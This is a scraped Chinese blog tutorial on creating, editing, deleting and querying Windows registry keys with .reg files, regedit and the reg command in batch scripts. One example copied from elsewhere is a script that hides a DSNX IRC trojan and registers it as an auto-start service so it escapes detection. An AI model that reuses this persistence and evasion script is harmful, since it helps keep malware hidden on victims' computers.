1. 程式人生 > >批處理操作登錄檔完全攻略(讀取登錄檔/寫入登錄檔等)

批處理操作登錄檔完全攻略(讀取登錄檔/寫入登錄檔等)

一,批處理生成.Reg檔案操作登錄檔 
用批處理中的重定向符號可以輕鬆地生成.reg檔案。然後用命令執行.reg檔案即可! 
這裡,著重要了解.reg檔案操作登錄檔的方法。 
首先.reg檔案首行必須是:Windows Registry Editor Version 5.00。然後才是操作登錄檔的內容。 
(就和從登錄檔中匯出的檔案格式一致) 

1,建立子項 
Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\TTT] 

在HKEY_LOCAL_MACHINE\SOFTWARE\下建立了一個名字為“TTT”的子項。 

2,建立一個專案名稱

Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\TTT] 
"Name"="TTT BLOG" 
"EMail"="[email protected]" 
"URL"="http://www.taoyoyo.net/ttt/" 
"Type"=dword:02 

這樣就在[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]下新建了:Name、EMail、 URL、Type這四個專案 
Name、Email、URL的型別是“String Value” 
Type的型別是“DWORD Value” 

(附:windows登錄檔值型別: 
REG_SZ 字串值 
REG_BINARY 二進位制值 
REG_DWORD DWORD值 
REG_MULTI_SZ 多字串值 
REG_EXPAND_SZ 可擴充字串值) 

3,修改鍵值 
修改相對來說比較簡單,只要把你需要修改的專案匯出,然後用記事本進行修改,然後匯入(regedit /s)即可。就象新建一樣即可。可以一次修改同一子項下的多個專案。 

4,刪除專案名稱

Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\TTT] 
"EMail"=- 

執行該指令碼,"EMail"就被刪除了; 

5,刪除子項

Windows Registry Editor Version 5.00 
[-HKEY_LOCAL_MACHINE\SOFTWARE\TTT] 
[-HKEY_LOCAL_MACHINE\SOFTWARE\DDD] 

 執行該指令碼,子項ttt和ddd就已經被刪除了。 

6,.reg檔案執行方法 
1)直接執行reg檔案 
2)regedit /s *.reg (/s不用確認) 
3)reg import *.reg 

7,其實,我們也可以用dll檔案代替reg檔案。 

批處理例1:

@echo off 
echo Windows Registry Editor Version 5.00 >t1.reg 
echo. 
echo [HKEY_LOCAL_MACHINE\SOFTWARE\TTT] >>t1.reg 
echo "Name"="TTT BLOG" >>t1.reg 
echo "EMail"="[email protected]" >>t1.reg 
echo "URL"="http://www.taoyoyo.net/ttt/" >>t1.reg 
echo "Type"=dword:02 >>t1.reg 
regedit /s t1.reg 
del /q t1.reg 
pause 

  批處理2:(這個例子是別人的,不是很懂的說~~) 
我們現在在使用一些比較老的木馬時,可能會在登錄檔的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一個鍵值用來實現木馬的自啟 動.但是這樣很容易暴露木馬程式的路徑,從而導致木馬被查殺,相對地若是將木馬程式註冊為系統服務則相對安全一些.下面以配置好地IRC木馬DSNX為例 (名為windrv32.exe)

@start windrv32.exe 
@attrib +h +r windrv32.exe 
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll 
@echo "windsnx "=- >>patch.dll 
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe 
@regedit /s patch.dll 
@delete patch.dll 
@REM [刪除DSNXDE在登錄檔中的啟動項,用sc.exe將之註冊為系統關鍵性服務的同時將其屬性設為隱藏和只讀,並config為自啟動] 
@REM 這樣不是更安全^_^. 

二,reg命令操作登錄檔 

Reg命令是Windows提供的一下專門操作登錄檔的工具。可以方便的查詢,新增,刪除,匯入,匯出,比較等操作。具體可以參考系統自帶的幫助…… 

REG Operation [引數列表] 
Operation [ QUERY | ADD | DELETE | COPY | 
SAVE | LOAD | UNLOAD | RESTORE | 
COMPARE | EXPORT | IMPORT ] 

1,查詢所有子項和值 

D:\>reg query hklm\software\TTT 

! REG.EXE VERSION 3.0 

HKEY_LOCAL_MACHINE\software\TTT 
Name REG_SZ TTT BLOG 
EMail REG_SZ [email protected] 
URL REG_SZ http://www.taoyoyo.net/ttt/ 
Type REG_DWORD 0x2 

2,查詢特定項 

D:\>reg query hklm\software\ttt /v url 

! REG.EXE VERSION 3.0 

HKEY_LOCAL_MACHINE\software\ttt 
url REG_SZ http://www.taoyoyo.net/ttt/ 

這裡最難的是如何取得我們想要的字串呢,困惑了好長時間,終於找到方法了。 
原來也沒有別的好辦法,只能用find,for迴圈來擷取我們需要的內容。(下面的例子如果看不懂,請參考本部落格另外的文章:DOS迴圈-bat/批處理for命令詳解之二) 
例如我們要得到url的鍵值: http://www.taoyoyo.net/ttt/,可以用以下指令碼:

@ECHO OFF 
for /f "tokens=1,2,3,4,*" %%i in ('reg query "HKEY_LOCAL_MACHINE\software\ttt" ^| find /i "URL"') do SET "pURL=%%k" 
echo TTT BLOG的URL值為:%pURL% 

 儲存為Test.bat,執行結果如下: 

D:\>test.bat 
TTT BLOG的URL值為:http://www.taoyoyo.net/ttt/ 

不行了,家裡的電腦不知為啥,在命令列中一執行“REG”命令(包括reg /?),CPU就佔用100%,看工作管理員,CMD佔用百分之八十多,不知道為啥…… 
執行其他的命令就沒有問題,包括regedit /s…… 

查了一下,網上有說是中了木馬的原因,但查了一下,也不象。既沒有找到相關檔案,而且執行其它的命令時,沒有問題…… 
先不搞了,正好手頭有個REG命令詳解,等會整理一下! 

因為查毒,用自己做的Clear.bat清理了一下C盤,居然清理出1個G的空間來,原來只剩幾百兆了……windows的垃圾真是多啊~~不要忘了經常清理一下啊! 

再發布兩個做好的批處理檔案,可以自動監控OutLook Express,有需要的可以點選下載…… 
1,OEMonitorCount.bat 功能:可以重設登錄檔中OE開啟次數,避免超過100次時提示壓縮 
2,OEMonitorSize.bat 功能:可以監控Outlook Express郵件檔案(*.dbx)大小,當大於指定大小時,生成報警日誌。 

這兩個檔案,可以加到啟動組裡,每次開機自動執行! 
搞這兩個主要是為了解決公司經常出現的一些問題: 
1)經常有人的郵件檔案超過幾個G; 
2)有時而且根據提示壓縮後,可能出現郵件丟失。 

剛發現,下載後的檔案又加了“htm"的字尾,請去掉此後綴再使用! 
另外下載時,請使用下面的連結,如:千腦電信高速下載地址、千腦網通高速下載地址。上面的VIP連結是專供千腦使用者使用的~~

相關推薦

處理操作完全(讀取/寫入)

一,批處理生成.Reg檔案操作登錄檔  用批處理中的重定向符號可以輕鬆地生成.reg檔案。然後用命令執行.reg檔案即可!  這裡,著重要了解.reg檔案操作登錄檔的方法。  首先.reg檔案首行必須是:Windows Registry Editor Version 5.

Reg命令使用詳解 處理操作必備

首先要說明:編輯登錄檔不當可能會嚴重損壞您的系統。在更改登錄檔之前,應備份計算機上任何有價值的資料 只有在別無選擇的情況下,才直接編輯登錄檔。登錄檔編輯器會忽略標準的安全措施,從而使得這些設定會降低效能、破壞系統,甚至要求使用者重新安裝Windows。可以利用“控制面板”或“Microsoft管

編寫reg檔案及處理操作

編寫登錄檔檔案 新建一個文字檔案,在其中輸入以下內容: Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\

鏈棧的基本操作(入棧和出棧)及C語言實現完全

鏈棧,即用線性表的連結串列結構實現棧的功能。實現過程中,鏈棧不需要建立頭結點,增加頭結點反而會增加程式的複雜性,因此連結串列中只需要建立一個頭指標就可以了。 鏈棧的實現思想是:用連結串列頭結點的一端作為棧的棧頂端,這樣做的好處是當資料元素壓棧或者彈棧時,直接使用頭指標就可以完成,不需要增設額外的指標。 例

寫入指令碼沒錯,但指定位置未寫入(x64)

使用INNO打包程式,在打包指令碼中添加了 [registry] 寫入登錄檔,指令碼沒問題,但就是在指定位置沒成功寫入登錄檔 後反覆研究,經群裡詢問得知是64位系統重定位問題,實際登錄檔有寫入成功,只不過是寫到了wowx86x64node下了,   解決: 只需在指令碼的

Android中,對SQLite的‘處理操作

使用execSQL進行批處理插入 今天學習了一下如何更加高效的執行對SQLite的插入操作 注:用的是真機測試 我們使用SQLiteDatabase的insert方法和execSQL分別進行試驗 首先是insert方法: public boolean

Amazon Comprehend 釋出非同步處理操作

我的同事 Jeff Barr 最近寫了一篇關於 Amazon Comprehend 的文章,這是一項用於發現文字中的見解和關係的服務,在 2017 年的 AWS re:Invent 大會上釋出。如今,在反覆研究客戶反饋之後,我們將釋出適用於 Comprehend 的全新非同步批量推理功能。非

cmd和python兩種進行處理操作

1.cmd命令列進行批處理,實現對某一檔案下所有檔案進行相同的處理 a.獲取資料夾下的檔案目錄,存入a.txt中 b.由於我是要對檔案進行SectionSing.exe(C++程式產生的exe操作),要進行滿足其格式要求的操作, 可以將所有檔案複製放到excel表格

JDBC學習(七、處理操作

一、批量操作(batch)    當需要成批插入或者更新記錄時,可以採用Java的批量更新機制,這一機制允許多條語句一次性提交給資料庫批量處理。通常情況下比單獨提交處理更有效率.JDBC的批量處理語句包括下面兩個方法:addBatch(String sql):新增需要批量處理

Java的jdbc使用addBatch進行處理操作的幾種方式

方式一、批量執行預定義模式的SQL public static void exeBatch(Connection conn) { try { String sql = "insert into t_example (code, name) values (?,?)";

【Head First Servlets and JSP】筆記23:Expression Language(EL) 完全

首部 基本 light == 命名 shm sign pack index 基本上是《Head First Servlets and JSP》內容的整理、擴充。順便推薦一個供參考的JSP教程:JSP Tutorial 內容很全面,還有一些有趣的實例。 完整代碼參考

【alert(1) to win】不完全

14. element PE win 一次 RM 處理 one pan alert(1) to win 一個練習XSS的平臺,地址:https://alf.nu/alert1 Warmup(14) 給出了一段JavaScript代碼 function escape(s)

C語言assert函式完全

斷言assert函式,C語言assert函式完全攻略 對於斷言,相信大家都不陌生,大多數程式語言也都有斷言這一特性。簡單地講,斷言就是對某種假設條件進行檢查。在 C 語言中,斷言被定義為巨集的形式(assert(expression)),而不是函式,其原型定義在<assert.h>檔

微信小遊戲 一筆畫完 完全

目錄 基本思路 美食喵 1-135關 西瓜喵1-15關 藍莓喵16-30關 咖啡喵31-45關 番茄喵46-60關 豆沙喵61-75關 橙汁喵76-90關 紫薯關91-105關 拿鐵喵106-120關 奶茶喵135關 社會喵 136-270關 原諒

【轉】VS2015編譯TensorFlow C++程式完全

VS2015編譯TensorFlow C++程式完全攻略 原文地址:https://blog.csdn.net/jacke121/article/details/80473648 本文參考和綜合了多篇網路部落格文章,加以自己的實踐,最終終於在windows環境下,編譯出可以用於C++程式呼叫

BlackholeSkins-DOTA2,CSGO開箱網站完全

找最好的dota2,csgo開箱網站,一定要上www.dota2sites.com BlackholeSkins是雙十一剛開的新dota2,csgo開箱網站,讓我們看看如何在該網站上玩開箱子吧。 點選訪問網站 首先網站現在僅支援qq登入,登入後儲存了登入資訊,再次登陸很方便。點選下圖的按鈕就可以QQ登陸

妖怪與和尚過河問題解法完全(C++完整程式碼實現)

如圖 1 所示。有三個和尚和三個妖怪(也可翻譯為傳教士和食人妖)要利用唯一一條小船過河,這條小船一次只能載兩個人,同時,無論是在河的兩岸還是在船上,只要妖怪的數量大於和尚的數量,妖怪們就會將和尚吃掉。現在需要選擇一種過河的安排,保證和尚和妖怪都能過河且和尚不能被妖怪吃掉。 圖 1 妖怪與和尚過河遊戲

分塊查詢演算法完全(原理、實現及時間複雜度)

一般對於需要查詢的待查資料元素列表來說,如果很少變化或者幾乎不變,則我們完全可以通過排序把這個列表排好序以便我們以後查詢。但是對於經常增加資料元素的列表來說,要是每次增加資料都排序的話,那真的是有點太累人了。 所以之前我們分析過,對於幾乎不變的資料列表來說,排序之後使用二分查詢是很不錯的,但是對於經常變動的

針對錦隆駕校考點[圖文並茂] 科目二C1手動考試 專治掛科

上車準備: 上車後先調整好座椅前後,以腿腳舒適為止,再調整座椅角度,這個非常關鍵,讓左側肩膀中心對準車門把手前端,然後調整後視鏡,讓兩邊都能看到車後方輪胎為宜,然後再插入保險帶(這裡可能考試督導員會催你早掛保險帶,不要管他),等待開始訊號。 記住左窗的標記,左邊看門把手

GitHub個人Blog完全

Git個人網站完整攻略 當前越來越多的大牛轉戰GitHub的時候,我們也應該考慮搭建自己的一個Blog來記錄自己的學習和成長經歷了。 一則,作為未來的碼農是需要自己與國際,至少是與主流的程式碼託管相接觸的。 二則,我想自己在校的時光也許需要重新好好的珍惜一下來之不